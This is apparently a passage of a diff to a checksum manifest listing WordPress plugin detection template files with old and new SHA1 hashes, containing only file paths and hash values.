-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:37900c349918911000d5a7eae87769e978e21988 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e -http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3aa657b603a122999a7b7f29025758df12a0b6f6 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:d26f592bef64c89241529ceb3de7bf691c6fa860 -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba -http/technologies/wordpress/plugins/php-compatibility-checker.yaml:ab022b7fe18254604161c5f7708894ed93201352 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 